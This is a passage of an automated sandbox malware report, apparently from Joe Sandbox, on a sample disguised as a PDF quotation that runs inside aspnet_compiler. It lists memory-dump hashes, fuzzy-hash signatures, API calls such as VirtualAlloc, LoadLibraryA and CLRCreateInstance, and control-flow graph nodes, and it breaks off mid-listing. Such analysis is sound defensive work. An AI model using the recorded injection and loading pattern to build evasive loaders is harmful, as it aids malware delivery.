                                                                  • Opcode ID: f9724b179cdcce45067571382a588691e81ea73f919fa37abf955c4d09b1ec2b
                                                                  • Instruction ID: ff04333f7cdf0d76aff6e05364cc01f9a2de2f9d21cb7eeef3a43d8937093c52
                                                                  • Opcode Fuzzy Hash: f9724b179cdcce45067571382a588691e81ea73f919fa37abf955c4d09b1ec2b
                                                                  • Instruction Fuzzy Hash: B121D831E0855D8FDB68EF98D495AEDB7B1FF98391F50017AD009A2281CB3469868B90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6d56a0be5cea2d866ba916df319ea2e5a4a5fbb2ff1550f73ee3bb09ee130f99
                                                                  • Instruction ID: 35371c26b14880fad6f9ca4ca1ac94b8b2370e76055fec0837ec25c5b6256f84
                                                                  • Opcode Fuzzy Hash: 6d56a0be5cea2d866ba916df319ea2e5a4a5fbb2ff1550f73ee3bb09ee130f99
                                                                  • Instruction Fuzzy Hash: 63212870E0895E8FEFA4EF58C8457A9B7B1FB68354F5041B6C00CE3290DB38A9858B90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 599befd6d2d84c648dd6567fe2861d4b35175e9fa272c060df5de13a3e34e4c8
                                                                  • Instruction ID: d5d5ef39a056e3d2be91d9ef0f8b76e7dd134e24dc2ffeadf9846f221f317626
                                                                  • Opcode Fuzzy Hash: 599befd6d2d84c648dd6567fe2861d4b35175e9fa272c060df5de13a3e34e4c8
                                                                  • Instruction Fuzzy Hash: BF21D132C1E6C14FF6D9733829151752EE0AFE2F90F2840FBC498970E79A185C4987DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d78ece4326ba709dd51a3f78a75faa01e91a5509215d1357687b7893ae4a9c23
                                                                  • Instruction ID: 509698e1ad0d40d8930f041cb8c618a73c063684da27228c9d7112f97411d191
                                                                  • Opcode Fuzzy Hash: d78ece4326ba709dd51a3f78a75faa01e91a5509215d1357687b7893ae4a9c23
                                                                  • Instruction Fuzzy Hash: 89116D32D1C85A0DF6F4B72898152B971D1EFE4B94F440177DC1DE35C3EF68291A4A89
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c3e48e647eac81fb812756e88d12da0b5c4b97ce6ac69922f7d1c18f8ee46bd4
                                                                  • Instruction ID: d0a1f83f5b85aad783c8bfca250cd86da85eea7db6d7970e2178b24b505a1753
                                                                  • Opcode Fuzzy Hash: c3e48e647eac81fb812756e88d12da0b5c4b97ce6ac69922f7d1c18f8ee46bd4
                                                                  • Instruction Fuzzy Hash: 2C11AC71A0D64E9EEB44EF6894502FA7BA1EF59394F44017AD409E6281CB3868808BA9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4868e34b5cf47752d29b3390d20786cab4cb80eb7ffac623de4e457821a65dc5
                                                                  • Instruction ID: 5d1e52e59979012b3a34b20a3d8e24ac086b0df109c33cb15f12555cbb9ee5ad
                                                                  • Opcode Fuzzy Hash: 4868e34b5cf47752d29b3390d20786cab4cb80eb7ffac623de4e457821a65dc5
                                                                  • Instruction Fuzzy Hash: D711B23181964D9FDB44FF18E885AE97BE0FF59348F0402A6E44DCA192DB38A544CB45
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 22185de9061dc86f6adee603b8704ac580462921044e0ab5cbe579e238481850
                                                                  • Instruction ID: f2a2b8df91e13f100eea7634b1c0e6883e84a677e26ff602088437cad7e02ecd
                                                                  • Opcode Fuzzy Hash: 22185de9061dc86f6adee603b8704ac580462921044e0ab5cbe579e238481850
                                                                  • Instruction Fuzzy Hash: 43119A31908A1E8FEB84EF18D895AFAB7E0FF64305F040266E408D6192DB35E944CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c7218ebb2e06c38380d633e6f56f64f6e8aa2a4c63eae1e899f812385a87edd
                                                                  • Instruction ID: 6c476560d4e0c3b051b3eeb91efbd043d298321f75e5c63fa20c8f5bd86f6cd6
                                                                  • Opcode Fuzzy Hash: 6c7218ebb2e06c38380d633e6f56f64f6e8aa2a4c63eae1e899f812385a87edd
                                                                  • Instruction Fuzzy Hash: 06110670E0895A8FEFA4EF5888457AAB7B1FB58794F5041B5C00DE3290CB38A9858F90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 78029a11f6ccb1a3da9f8a671daca7001274da7b61b52c989dfab9e6e5c2553d
                                                                  • Instruction ID: b5b86d0ef9ab8837e47fae04c3ccd8830f5e3dfb3275ffd0ded7fd8d60bff663
                                                                  • Opcode Fuzzy Hash: 78029a11f6ccb1a3da9f8a671daca7001274da7b61b52c989dfab9e6e5c2553d
                                                                  • Instruction Fuzzy Hash: 71115830919A4D9FDF84EF6CD859AEA7BF0FF28305F040666E408D72A1DB34A484CB80
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1f51aa56a6770e8b8f63c2d31d82a39b51755cfd6649716813e11ca33304881a
                                                                  • Instruction ID: aa31222c86410ecf7331b93063e2cf81a330b5330ff78b117f9123b40d2e8b9d
                                                                  • Opcode Fuzzy Hash: 1f51aa56a6770e8b8f63c2d31d82a39b51755cfd6649716813e11ca33304881a
                                                                  • Instruction Fuzzy Hash: 59010970E0855A8EEFA4EF9888457ADB7B1FF58354F504175C00DE2290CB3868858F90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2b887c822227d78e0593816450bf6ad20d9cb5b7360128dbf6f3e942f1e9695d
                                                                  • Instruction ID: a0fe1acbef157532e5b0d9868374e3ce538bb004738ff987f3a374fff3af5a54
                                                                  • Opcode Fuzzy Hash: 2b887c822227d78e0593816450bf6ad20d9cb5b7360128dbf6f3e942f1e9695d
                                                                  • Instruction Fuzzy Hash: CBF03A30919A0D9FEB41FF58D4496EDBBE0FF68345F100577E80DE2191DB34A6908B85
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f647b2f28fa5ffebd39766a2ff78d4aac0e5c5340e3feb196ebd26cf9a913a98
                                                                  • Instruction ID: e03654b3233e133fb60aef886a40a5b7b3ca168ec224eb16adfb6901a25477fb
                                                                  • Opcode Fuzzy Hash: f647b2f28fa5ffebd39766a2ff78d4aac0e5c5340e3feb196ebd26cf9a913a98
                                                                  • Instruction Fuzzy Hash: CFF01C30918A4D9FEB84EF68D8496EABBE0FF28345F004576E80CD2191DB34A690CB85
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 988b411fea26a09e8a52b9f269060917f73331543c722fbe9d0ee0588282d023
                                                                  • Instruction ID: 5980581aa2e3cd86cbec9390eb576e65cded174bf082748e9677339566d8d862
                                                                  • Opcode Fuzzy Hash: 988b411fea26a09e8a52b9f269060917f73331543c722fbe9d0ee0588282d023
                                                                  • Instruction Fuzzy Hash: 93E0E630D0D95D89DB14EB10CC552E973A1EF54705F4141F6800EB6595DF786A408E40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e6b670664dcf0410e959c876d18cb890317e9cbb84aeadd1f6895c362e5c8c8d
                                                                  • Instruction ID: c9a0cf2bbdbae5b9b3dae1ca734c49b333e9429523d0350a61c9251397684eac
                                                                  • Opcode Fuzzy Hash: e6b670664dcf0410e959c876d18cb890317e9cbb84aeadd1f6895c362e5c8c8d
                                                                  • Instruction Fuzzy Hash: 9CD09E70C1C55C8EEBA4EB18D844BE8B6F1EF18700F1040EA800DF26C1CA351BC18F14
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 92c73b90aee2afb6c76224d5fb672246032418921fc0450e4289ab58ca790ce9
                                                                  • Instruction ID: 9a14ba25169c7d8d202e0c7eb9173e6bffd52c42f7b85ff3419222b4303486e9
                                                                  • Opcode Fuzzy Hash: 92c73b90aee2afb6c76224d5fb672246032418921fc0450e4289ab58ca790ce9
                                                                  • Instruction Fuzzy Hash: 22A0223A88808CCAEFA02A0038000F83300EB80200F800023EE0EA20808B2222380088
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c4e61808683e9b88a3365d481e3c667ce9d9a3e257e67e07b770b62a8a7db0a5
                                                                  • Instruction ID: a7008dfb0a4bb30bb962c76513e64b4ba5e55e7f160fac6db1d31110eb67ac72
                                                                  • Opcode Fuzzy Hash: c4e61808683e9b88a3365d481e3c667ce9d9a3e257e67e07b770b62a8a7db0a5
                                                                  • Instruction Fuzzy Hash: 8721C537B1E92E58A324367D78810FE9790FBC127EB04573BD288DD4438D0D548B02E4

                                                                  Execution Graph

                                                                  Execution Coverage:19.9%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:60
                                                                  Total number of Limit Nodes:2
                                                                  execution_graph 5013 1f59dd42d9c 5014 1f59dd42dc5 5013->5014 5015 1f59dd42e00 VirtualAlloc 5014->5015 5017 1f59dd42e19 5014->5017 5016 1f59dd42e45 5015->5016 5015->5017 5016->5017 5019 1f59dd42f10 5016->5019 5028 1f59dd445b4 5016->5028 5019->5017 5027 1f59dd42fc7 5019->5027 5040 1f59dd41d04 5019->5040 5021 1f59dd42fae 5021->5017 5047 1f59dd41e30 5021->5047 5022 1f59dd430e9 5052 1f59dd435a8 5022->5052 5024 1f59dd43099 5024->5017 5032 1f59dd42b28 5024->5032 5027->5017 5027->5022 5027->5024 5029 1f59dd445d2 5028->5029 5030 1f59dd4467d LoadLibraryA 5029->5030 5031 1f59dd44685 5029->5031 5030->5031 5031->5016 5033 1f59dd42b65 CLRCreateInstance 5032->5033 5036 1f59dd42b7e 5032->5036 5033->5036 5035 1f59dd42c2d 5035->5017 5036->5035 5037 1f59dd42c8b SysAllocString 5036->5037 5038 1f59dd42c5f 5036->5038 5037->5038 5038->5035 5038->5038 5039 1f59dd42d71 SafeArrayDestroy 5038->5039 5039->5035 5041 1f59dd445b4 LoadLibraryA 5040->5041 5042 1f59dd41d23 5041->5042 5046 1f59dd41d2b 5042->5046 5062 1f59dd4469c 5042->5062 5044 1f59dd41d4a 5045 1f59dd4469c LoadLibraryA 5044->5045 5044->5046 5045->5046 5046->5021 5048 1f59dd445b4 LoadLibraryA 5047->5048 5049 1f59dd41e4e 5048->5049 5050 1f59dd4469c LoadLibraryA 5049->5050 5051 1f59dd41e63 5050->5051 5051->5027 5053 1f59dd435fc 5052->5053 5054 1f59dd445b4 LoadLibraryA 5053->5054 5056 1f59dd43a59 5053->5056 5057 1f59dd4469c LoadLibraryA 5053->5057 5061 1f59dd43e30 5053->5061 5054->5053 5055 1f59dd445b4 LoadLibraryA 5055->5056 5056->5055 5058 1f59dd4469c LoadLibraryA 5056->5058 5059 1f59dd43af8 5056->5059 5057->5053 5058->5056 5059->5061 5072 1f59dd44358 5059->5072 5061->5017 5063 1f59dd4480c 5062->5063 5064 1f59dd446d2 5062->5064 5063->5044 5064->5063 5066 1f59dd42508 5064->5066 5068 1f59dd4254b 5066->5068 5071 1f59dd42574 5066->5071 5067 1f59dd445b4 LoadLibraryA 5069 1f59dd42584 5067->5069 5068->5069 5070 1f59dd4469c LoadLibraryA 5068->5070 5068->5071 5069->5063 5070->5068 5071->5067 5071->5069 5073 1f59dd44394 5072->5073 5074 1f59dd44590 5073->5074 5075 1f59dd4469c LoadLibraryA 5073->5075 5074->5061 5075->5073 5007 1f59dd42b66 CLRCreateInstance 5009 1f59dd42b7e 5007->5009 5008 1f59dd42c2d 5009->5008 5010 1f59dd42c8b SysAllocString 5009->5010 5011 1f59dd42c5f 5009->5011 5010->5011 5011->5008 5011->5011 5012 1f59dd42d71 SafeArrayDestroy 5011->5012 5012->5008

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 53 1f59dd42d9c-1f59dd42df4 call 1f59dd44844 * 3 60 1f59dd42e26 53->60 61 1f59dd42df6-1f59dd42df9 53->61 63 1f59dd42e29-1f59dd42e44 60->63 61->60 62 1f59dd42dfb-1f59dd42dfe 61->62 62->60 64 1f59dd42e00-1f59dd42e17 VirtualAlloc 62->64 65 1f59dd42e19-1f59dd42e20 64->65 66 1f59dd42e45-1f59dd42e6e call 1f59dd44dc4 call 1f59dd44de4 64->66 65->60 67 1f59dd42e22 65->67 72 1f59dd42eaa-1f59dd42ec0 call 1f59dd44844 66->72 73 1f59dd42e70-1f59dd42ea4 call 1f59dd449f8 call 1f59dd448b8 66->73 67->60 72->60 79 1f59dd42ec6-1f59dd42ec7 72->79 73->72 82 1f59dd430ff-1f59dd43100 73->82 81 1f59dd42ecd-1f59dd42ed3 79->81 83 1f59dd42ed5 81->83 84 1f59dd42f10-1f59dd42f1b 81->84 87 1f59dd43105-1f59dd43116 82->87 88 1f59dd42ed7-1f59dd42ed9 83->88 85 1f59dd42f1d-1f59dd42f37 call 1f59dd44844 84->85 86 1f59dd42f50-1f59dd42f59 84->86 108 1f59dd42f39-1f59dd42f40 85->108 109 1f59dd42f46-1f59dd42f4e 85->109 90 1f59dd42f7a-1f59dd42f83 86->90 91 1f59dd42f5b-1f59dd42f6b call 1f59dd41ec0 86->91 92 1f59dd43149-1f59dd4316a call 1f59dd44de4 87->92 93 1f59dd43118-1f59dd43122 87->93 94 1f59dd42edb-1f59dd42ee1 88->94 95 1f59dd42ef2-1f59dd42ef4 88->95 90->87 96 1f59dd42f89-1f59dd42f93 90->96 91->87 115 1f59dd42f71-1f59dd42f78 91->115 122 1f59dd4316c 92->122 123 1f59dd43170-1f59dd43172 92->123 93->92 101 1f59dd43124-1f59dd43142 call 1f59dd44de4 93->101 94->95 102 1f59dd42ee3-1f59dd42ef0 94->102 95->84 97 1f59dd42ef6-1f59dd42f09 call 1f59dd445b4 95->97 104 1f59dd42f95-1f59dd42f96 96->104 105 1f59dd42f9d-1f59dd42fa4 96->105 114 1f59dd42f0e 97->114 101->92 102->88 102->95 104->105 112 1f59dd42fa6-1f59dd42fb0 call 1f59dd41d04 105->112 113 1f59dd42fd8-1f59dd42fdc 105->113 108->82 108->109 109->85 109->86 126 1f59dd42fb2-1f59dd42fb9 112->126 127 1f59dd42fbf-1f59dd42fc9 call 1f59dd41e30 112->127 118 1f59dd42fe2-1f59dd4300b 113->118 119 1f59dd4308f-1f59dd43097 113->119 114->81 115->105 118->87 136 1f59dd43011-1f59dd4302b call 1f59dd44dc4 118->136 124 1f59dd430e9-1f59dd430ef call 1f59dd435a8 119->124 125 1f59dd43099-1f59dd4309f 119->125 122->123 123->63 134 1f59dd430f4-1f59dd430fb 124->134 129 1f59dd430b6-1f59dd430c8 call 1f59dd42b28 125->129 130 1f59dd430a1-1f59dd430a7 125->130 126->87 126->127 127->113 145 1f59dd42fcb-1f59dd42fd2 127->145 143 1f59dd430da-1f59dd430e7 call 1f59dd425b8 129->143 144 1f59dd430ca-1f59dd430d5 call 1f59dd43178 129->144 130->134 135 1f59dd430a9-1f59dd430b4 call 1f59dd4405c 130->135 134->87 140 1f59dd430fd 134->140 135->134 147 1f59dd43047-1f59dd4308a 136->147 148 1f59dd4302d-1f59dd43030 136->148 140->140 143->134 144->143 145->87 145->113 147->87 156 1f59dd4308c-1f59dd4308d 147->156 148->119 151 1f59dd43032-1f59dd43045 call 1f59dd44b48 148->151 151->156 156->119
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3318682835.000001F59DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F59DD20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1f59dd20000_aspnet_compiler.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 8a2170de53a62e15b06d68cedc8902e765ed4ca48a6a709c27748450887b43b9
                                                                  • Instruction ID: ee877543d6edb2bb116c3eecf1c9929998ea057cf86e169eba6f0947d170ed33
                                                                  • Opcode Fuzzy Hash: 8a2170de53a62e15b06d68cedc8902e765ed4ca48a6a709c27748450887b43b9
                                                                  • Instruction Fuzzy Hash: 85C1CA30214F06CBEB5DEA68C4A57FAB7D2FF59308F543239D58ACB1C6DB60D8428681

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 81db4d9ae5e9f2dd85cdd5bdc53f4d2e7858a189c22bf25422dd7074759413cb
                                                                  • Instruction ID: 61cb17e88534e7747a6a3e93274096d9511df99cade56f4fb3dbf55202269a2b
                                                                  • Opcode Fuzzy Hash: 81db4d9ae5e9f2dd85cdd5bdc53f4d2e7858a189c22bf25422dd7074759413cb
                                                                  • Instruction Fuzzy Hash: CDB12270D1961D9FDB95EF68C855BECBBF0EF19301F1001AAD049E72A2DB38A981CB15

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 303 7ff848fe9e4d-7ff848fe9e81 304 7ff848fe9e83 303->304 305 7ff848fe9e88-7ff848fe9f25 303->305 304->305 315 7ff848fea1af-7ff848fea239 305->315 316 7ff848fe9f2b-7ff848fe9f7d 305->316 318 7ff848fea241-7ff848fea249 315->318 319 7ff848fea23b-7ff848fea240 315->319 323 7ff848fe9f84-7ff848fe9f8b 316->323 324 7ff848fe9f7f 316->324 319->318 325 7ff848fe9f92-7ff848fe9ffb 323->325 326 7ff848fe9f8d 323->326 324->323 331 7ff848fea002-7ff848fea0a7 call 7ff848fe6218 325->331 332 7ff848fe9ffd 325->332 326->325 339 7ff848fea0ae-7ff848fea0ff call 7ff848fe6218 331->339 340 7ff848fea0a9 331->340 332->331 343 7ff848fea101-7ff848fea104 339->343 344 7ff848fea158-7ff848fea15d 339->344 340->339 345 7ff848fea106-7ff848fea11a 343->345 346 7ff848fea185-7ff848fea18a 343->346 347 7ff848fea168-7ff848fea17c 344->347 348 7ff848fea18b-7ff848fea192 345->348 352 7ff848fea11c-7ff848fea120 345->352 346->348 350 7ff848fea195-7ff848fea19c 347->350 351 7ff848fea17e 347->351 348->350 353 7ff848fea1a1-7ff848fea1a8 call 7ff848fe6220 350->353 351->346 352->353 354 7ff848fea122 352->354 356 7ff848fea1ad-7ff848fea1ae 353->356 354->344 356->315
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0516603e24fb333a61d9669fc9e3076e282916135f0f598fee4c38fbd6d38378
                                                                  • Instruction ID: 637d4b1b103c34c483bce9c8c4c85b7201c1f44609a4da6168a5e10329686f01
                                                                  • Opcode Fuzzy Hash: 0516603e24fb333a61d9669fc9e3076e282916135f0f598fee4c38fbd6d38378
                                                                  • Instruction Fuzzy Hash: 48A12670D09A0A8FEB94EF58C854BE9B7A1FF58340F1046A9D01DE32D2DB38A985CB55
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c9b6a5438ce8dae4e6930b0f0299e80c23f251161f4aa0bfdcd13c91ae20f58f
                                                                  • Instruction ID: a207b0f6dca33d68798bca9e12367c22c29cdef5609b9bc10b79d2f77dab2e34
                                                                  • Opcode Fuzzy Hash: c9b6a5438ce8dae4e6930b0f0299e80c23f251161f4aa0bfdcd13c91ae20f58f
                                                                  • Instruction Fuzzy Hash: F9010031D1861A8FEB50EFA5C4407FEB2B1EF95354F108139C128A71D5CB796599CF84

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3318682835.000001F59DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F59DD20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1f59dd20000_aspnet_compiler.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocArrayCreateDestroyInstanceSafeString
                                                                  • String ID:
                                                                  • API String ID: 815377780-0
                                                                  • Opcode ID: 1e378af6d27dfc507e22e8ba87a9d8664e9aae4a206c1945e061b62da3beb022
                                                                  • Instruction ID: 5aae93d84e4f24af89fc98b15f06b498e62efd817f9e2d9bbb46a8c13a927f52
                                                                  • Opcode Fuzzy Hash: 1e378af6d27dfc507e22e8ba87a9d8664e9aae4a206c1945e061b62da3beb022
                                                                  • Instruction Fuzzy Hash: BC716D30218F09CFDB68EF28C8997A6B7E1FF99305F105629959BCB191DB30E505CB81

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3318682835.000001F59DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F59DD20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1f59dd20000_aspnet_compiler.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID: l
                                                                  • API String ID: 1029625771-2517025534
                                                                  • Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                                                  • Instruction ID: 61a9df773b53b5ac148ff575d467a0e9a59e6a6d4b407441e8898136c3538674
                                                                  • Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                                                  • Instruction Fuzzy Hash: 6331B430518F868FE799DB28C0547B6BBD6FBA931CF2466BCC1CAC7192D7A0D8468701

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 157 1f59dd42b28-1f59dd42b5f 158 1f59dd42b65 157->158 159 1f59dd42bff-1f59dd42c06 157->159 160 1f59dd42b66-1f59dd42b78 CLRCreateInstance 158->160 161 1f59dd42c29-1f59dd42c2b 159->161 162 1f59dd42c08-1f59dd42c21 159->162 163 1f59dd42c38-1f59dd42c3b 160->163 164 1f59dd42b7e-1f59dd42b97 160->164 165 1f59dd42c3d-1f59dd42c42 161->165 166 1f59dd42c2d-1f59dd42c33 161->166 162->161 163->162 169 1f59dd42b9c-1f59dd42bb3 164->169 168 1f59dd42c47-1f59dd42c49 165->168 167 1f59dd42d7d-1f59dd42d98 166->167 170 1f59dd42d7a-1f59dd42d7b 168->170 171 1f59dd42c4f-1f59dd42c5d 168->171 174 1f59dd42bb8-1f59dd42bba 169->174 170->167 172 1f59dd42c71-1f59dd42c86 171->172 173 1f59dd42c5f-1f59dd42c6f 171->173 179 1f59dd42c8b-1f59dd42ca9 SysAllocString 172->179 181 1f59dd42cb9-1f59dd42cbc 173->181 175 1f59dd42bbc-1f59dd42bcf 174->175 176 1f59dd42bf8-1f59dd42bf9 174->176 175->162 182 1f59dd42bd1-1f59dd42bd9 175->182 178 1f59dd42bfb-1f59dd42bfd 176->178 178->159 178->162 183 1f59dd42cad-1f59dd42cb1 179->183 181->170 184 1f59dd42cc2-1f59dd42cd7 181->184 182->178 185 1f59dd42bdb-1f59dd42bf1 182->185 183->181 184->170 187 1f59dd42cdd-1f59dd42d0e 184->187 188 1f59dd42bf6 185->188 187->170 190 1f59dd42d10-1f59dd42d1c 187->190 188->178 191 1f59dd42d33-1f59dd42d3f 190->191 192 1f59dd42d1e-1f59dd42d31 190->192 193 